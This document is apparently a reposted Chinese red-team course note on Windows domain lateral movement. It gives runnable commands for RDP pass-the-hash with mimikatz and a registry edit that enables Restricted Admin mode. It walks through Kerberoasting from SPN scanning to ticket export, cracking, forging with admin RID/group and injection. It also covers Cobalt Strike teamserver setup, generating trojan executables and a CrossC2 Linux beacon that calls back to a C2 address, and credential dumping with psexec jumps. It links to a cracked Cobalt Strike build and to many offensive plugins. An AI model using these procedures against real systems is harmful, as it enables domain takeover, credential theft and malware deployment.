9.4-14域横向-CobaltStrike&SDN&RDP

域横向RDP-mimikatz

1、RDP明文密码链接

2、RDP密文hash链接

域横向SPN服务-探针，请求，导出，破解，重写

SPN扫描

当计算机加入域时，主SPN会自动添加到域的计算机账号的ServicePrincipalName属性中。在安装新的服务后，SPN也会被记录在计算机账号的相应属性中。

SPN扫描也称为“扫描Kerberos服务实例名称”。在活动目录中发现服务的最佳方法就是SPN扫描。SPN扫描通过请求特定SPN类型的服务主体名称来查找服务。与网络端口扫描相比，SPN扫描的主要特点是不需要通过连接网络中的每个IP地址来检查服务端口（不会因为触发内网中的IPS、IDS等设备的规则而产生大量的警告日志）。因为SPN查询是Kerberos票据行为的一部分，所以检测难度很大。

由于SPN扫描是基于LDAP协议向域控制器进行查询的，所以，攻击者只需要获得一个普通的域用户权限，就可以进行SPN扫描。

在域环境中，发现服务的最好办法就是通过“SPN扫描”通过请求特定SPN类型服务主体名称来查找服务。

域横向移动RDP传递-Mimikatz

除了上述讲到的IPC，WMI，SMB等协议的链接外，获取到的明文密码或HASH密文也可以通过RDP协议（远程桌面）进行链接操作。

判断对方远程桌面服务是否开启（默认：3389），端口扫描判断;win+r:msts

RDP明文密码链接

Windows：mstsc（远程桌面连接）-输入账号密码

Windows命令行：mstsc.exe /console /v:[IP] /admin

Linux：（需要安装rdesktop）rdesktop [IP]

RDP密文HASH链接

windows Server需要开启Restricted Admin mode，在Windows 8.1和Windows Server 2012 R2中默认开启，同时如果Win 7和Windows Server 2008 R2安装了2871997、2973351补丁也支持，开启命令：

REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f

通过mimikatz链接

mstsc.exe /restrictedadmin

mimikatz.exe

privilege::debug

sekurlsa::pth /user:administrator /domain:lcn.cn /ntlm:b7f2f7b2491ba316e8cd773f8c2d58df "/run:mstsc.exe /restrictedadmin"

域横向移动SPN服务-探针，请求，导出，破解，重写

https://www.cnblogs.com/backlion/p/8082623.html

黑客可以使用有效的域用户的身份验证票证（TGT）去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN，并使用与SPN关联的服务帐户加密票证，以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5，这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解，即可得到目标服务帐号的HASH，这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN，那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。

以下操作都在PowerShell进行

1、探针：探测域内主机常见服务

什么权限都可以完成探测

探测域内服务

setspn -q /

寻找特定服务，如MSSQL

setspn -q / | findstr "[服务名]"

找到合适的服务作为攻击目标

2、请求

清空当前机器中的凭证，防止影响下面的操作（可以不删除）

查看已有票据

klist

删除已有票据

klist purge

请求对应服务

Add-Type -AssemblyName System.IdentityModel

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "[服务名]"

New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/xiaolu.lcn.cn:1433"

使用mimikatz请求

mimikatz.exe "kerberos::ask /target:[服务名]"

3、导出

导出凭据

mimikatz.exe "kerberos::list /export"

利用mimikatz导出，会导出到mimikatz所在的目录

4、破解（鸡肋）

破解凭据

可以将凭证复制到本地破解，避免提交破解的脚本

使用忍者系统tgsrepcrack.py脚本加爆破字典来破解

将凭据放在脚本文件目录中后

python3 .\tgsrepcrack.py .[密码文件.txt] .[凭据.kirbi]

python3 .\tgsrepcrack.py .\password.txt .[0;3e4]-0-1-40a50000-XIAOLU$@LDAP-WIN-5P9N6179EBS.lcn.cn.kirbi
    

破解成功会把被攻击的服务账户的明文密码显示出来，再想办法利用密码

5、重写

使用kerberoast.py和密码重写凭据

python kerberoast.py -p [得到的密码] -r [已有的凭据.kirbi] -w [新凭据的名字.kirbi] -u 500

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -u 500

python kerberoast.py -p [得到的密码] -r [已有的凭据.kirbi] -w [新凭据的名字.kirbi] -g 512

python kerberoast.py -p Password123 -r xxxx.kirbi -w PENTESTLAB.kirbi -g 512

“-u 500”指管理员，“-g 512”指管理员组

6.将生成的票据注入内存

mimikatz.exe kerberos::ptt [票据文件.kirbi]

mimikatz.exe kerberos::ptt xxxx.kirbi

用重写的凭据来链接，不一定成功，且一般只能得到普通用户权限

三、域横向移动测试流程一把梭哈-CobaltStrike初体验

大概流程：

启动-配置-监听-执行-上线-提权-信息收集(网络，凭证，定位等)-渗透

1.关于启动及配置讲解

启动

服务器：

需要Java环境支持

来到CobaltStrike所在的目录

运行“teamserver”，后面是安装CobaltStrike的服务器的IP，而后是工具链接服务器的密码

./teamserver [IP] [密码]

./teamserver 192.168.127.128 lusang lcn123456

客户端：

需要Java环境支持

直接运行“start.bat”，Host为服务器IP，Port为50050，User随便填，Password为刚刚设定的密码，点链接

配置

配置监听器：

选择“Cobalt Strike”“Listeners”

选择“Add”，“Payload”选择木马回连的协议，这里选择HTTP；随便取个名字；“HTTP Host（Stager）”填服务器地址；“HTTP Port（C2）”填回连的端口

生成木马：

选择“Attacks”“Packages”，然后根据需要选择后门类型。这里选择“Windows Executable”，“Output”选择“Windows EXE”，勾选x64。“Listener”选择自己的监听器，点击“Generate”

选择保存木马的位置，填写名字，“保存”。注意会被杀软查杀

执行木马：

想办法将木马传输到目标机器并执行

在“Event Log”会提示对应IP的终端上线了，在Event Log和视图页面可以看见主机的名字和权限

上线linux

安装插件crossc2；

./genCrossC2.Linux 192.168.127.128 5555 ./.cobaltstrike.beacon_keys null Linux x64 t_cc2.out

修改cna文件；

$CC2_PATH = "C:\Users\Administrator.DESKTOP-F148003\Desktop\honey\CS4.4完全汉化版破解\CS4.4完全汉化版破解"; # <-------- fix
$CC2_BIN = "genCrossC2.Linux";

运行t_cc2.out文件，linux‘主机成功上线cs；

2.关于提权及插件加载

在视图界面，选中机器右键。“Interact”，打开命令行终端；“Session”，链接的管理和笔记等功能；中间是包括端口扫描、黄金票据、运行MimiKatz等常用功能

选中机器右键，“Access”“Elevate”即提权功能，但默认只有两种提权方式，需要安装插件

选择合适的EXP和监听器，点击“Launch”提权，成功后会显示在视图界面

安装插件：

选择“Cobalt Strike”“Script Manager”，选择“Load”载入所需插件的.cna文件，将.cna文件“Unload”

提权速度过慢：

选择“Session”“Sleep”，设置为1或者0

3.关于信息收集命令讲解

在视图界面，选中SYSTEM权限的机器右键。“Interact”，打开命令行终端

输入“help”，查看命令

输入“getuid”，获取权限情况

输入“net view”，探测当前的网络环境

选择“View”“Targets”，会展示所有已探测的信息

输入“net computers”，探测所有的机器的名字与IP

输入“net dclist”，获取当前域控的信息

输入“net user”，获取当前用户信息

输入“shell net user /domain”，加“shell”调用cmd执行命令，得到域内所有用户的名字

选择“Access”“Run Mimikatz”或者输入“mimikatz”来运行mimikatz

选择“View”“Credentials”，会展示mimikatz收集的密码信息

回到“Targets”界面，选中一台机器，右键“Jump”，选择合适的攻击方法进攻。这里以“psexec”为例

可以选择收集到的密码来攻击，也可以手动填写，选择合适的监听器和负责攻击的会话，点击“Launch”

自主工具：

可以上传第三方工具，调用cmd执行，借助工具提高效率

代理问题：

确保信息能够传输回来

4.关于视图自动化功能讲解

涉及资源：

kerberos中的spn详解：https://www.cnblogs.com/backlion/p/8082623.html

kerberoast：https://github.com/nidem/kerberoast

taowu-cobalt-strike（插件-小迪精选）：https://github.com/pandasec888/taowu-cobalt-strike

Cobalt Strike 4.0手册：https://pan.baidu.com/s/15DCt2Rzg5cZjXnEuUTgQ9Q 提取码：dtm2

红队实战演练环境：https://pan.baidu.com/s/14eVDglqba1aRXi9BGcBbug 提取码：taqu

Erebus（插件-小迪使用）：https://github.com/DeEpinGh0st/Erebus

（Cobalt Strike插件）：https://github.com/rsmudge/Elevatekit

（Cobalt Strike插件）：https://github.com/harleyQu1nn/AggressorScripts

（Cobalt Strike插件）：https://github.com/bluscreenofjeff/AggressorScripts

（Cobalt Strike插件）：https://github.com/michalkoczwara/aggressor_scripts_collection

（Cobalt Strike插件）：https://github.com/vysecurity/Aggressor-VYSEC

（Cobalt Strike插件）：https://github.com/killswitch-GUI/CobaltStrike-ToolKit

（Cobalt Strike插件）：https://github.com/ramen0x3f/AggressorScripts

（Cobalt Strike插件）：https://github.com/FortyNorthSecurity/AggressorAssessor

（Cobalt Strike插件）：https://github.com/threatexpress/persistence-aggressor-script

（Cobalt Strike插件）：https://github.com/threatexpress/aggressor-scripts

（Cobalt Strike插件）：https://github.com/branthale/CobaltStrikeCNA

（Cobalt Strike插件）：https://github.com/gaudard/scripts/tree/master/red-team/aggressor

（Cobalt Strike插件）：https://github.com/001SPARTaN/aggressor_scripts

（Cobalt Strike插件）：https://github.com/Und3rf10w/Aggressor-scripts

（Cobalt Strike插件）：https://github.com/rasta-mouse/Aggressor-Script

（Cobalt Strike插件）：https://github.com/vysec/Aggressor-VYSEC

（Cobalt Strike插件）：https://github.com/threatexpress/aggressor-scripts

（Cobalt Strike插件）：https://github.com/threatexpress/red-team-scripts

（Cobalt Strike插件）：https://github.com/vysecurity/CVE-2018-4878

（Cobalt Strike插件）：https://github.com/harleyQu1nn/AggressorScripts

（Cobalt Strike插件）：https://github.com/bluscreenofjeff/AggressorScripts

（Cobalt Strike插件）：https://github.com/QAX-A-Team/CobaltStrike-Toolset

（Cobalt Strike插件）：https://github.com/ars3n11/Aggressor-Scripts

（Cobalt Strike插件）：https://github.com/michalkoczwara/aggressor_scripts_collection

（Cobalt Strike插件）：https://github.com/killswitch-GUI/CobaltStrike-Toolkit

（Cobalt Strike插件）：https://github.com/ZonkSec/persistence-aggressor-script

（Cobalt Strike插件）：https://github.com/rasta-mouse/Aggressor-Script

（Cobalt Strike插件）：https://github.com/RhinoSecurityLabs/Aggressor-Scripts

（Cobalt Strike插件）：https://github.com/Kevin-Robertson/Inveigh

（Cobalt Strike插件）：https://github.com/Genetic-Malware/Ebowla

（Cobalt Strike插件）：https://github.com/001SPARTaN/aggressor_scripts

（Cobalt Strike插件）：https://github.com/gaudard/scripts/tree/master/red-team/aggressor

（Cobalt Strike插件）：https://github.com/branthale/CobaltStrikeCNA

（Cobalt Strike插件）：https://github.com/oldb00t/AggressorScripts

（Cobalt Strike插件）：https://github.com/p292/Phant0m_cobaltstrike

（Cobalt Strike插件）：https://github.com/p292/DDEAutoCS

（Cobalt Strike插件）：https://github.com/secgroundzero/CS-Aggressor-Scripts

（Cobalt Strike插件）：https://github.com/skyleronken/Aggressor-Scripts

（Cobalt Strike插件）：https://github.com/tevora-threat/aggressor-powerview

（Cobalt Strike插件）：https://github.com/tevora-threat/PowerView3-Aggressor

（Cobalt Strike插件）：https://github.com/threatexpress/persistence-aggressor-script

（Cobalt Strike插件）：https://github.com/FortyNorthSecurity/AggressorAssessor

（Cobalt Strike插件）：https://github.com/mdsecactivebreach/CACTUSTORCH

（Cobalt Strike插件）：https://github.com/C0axx/AggressorScripts

（Cobalt Strike插件）：https://github.com/offsecginger/AggressorScripts

（Cobalt Strike插件）：https://github.com/tomsteele/cs-magik

（Cobalt Strike插件）：https://github.com/bitsadmin/nopowershell

（Cobalt Strike插件）：https://github.com/SpiderLabs/SharpCompile 作者：shtome https://www.bilibili.com/read/cv14802167/?spm_id_from=333.999.0.0 出处：bilibili